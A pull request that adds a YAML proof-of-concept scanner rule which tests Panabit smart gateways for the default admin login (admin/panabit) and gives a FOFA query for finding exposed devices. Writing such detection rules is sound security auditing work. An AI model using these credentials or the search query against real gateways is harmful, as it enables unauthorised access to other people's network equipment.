### PR TITLE
panabit-gateway-default-password

### DIFF
--- a/pocs/panabit-gateway-default-password.yml
+++ b/pocs/panabit-gateway-default-password.yml
@@ -1,0 +1,11 @@
+name: poc-yaml-panabit-gateway-default-password
+rules:
+  - method: POST
+    path: /login/userverify.cgi
+    body: username=admin&password=panabit
+    expression: |
+      response.status == 200 && response.headers["Set-Cookie"].contains("paonline_admin") && response.body.bcontains(b"URL=/index.htm")
+detail:
+  author: Print1n(https://github.com/Print1n)
+  links:
+    - https://max.book118.com/html/2017/0623/117514590.shtm


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
Panabit-智能网关 默认账密
## 测试环境
FOFA：app="Panabit-智能网关"
## 备注
对[#1225]()POC的补充完善
![image](https://user-images.githubusercontent.com/73928418/127741716-421c7852-1c15-4c94-a8b3-6aefd06c6d5e.png)
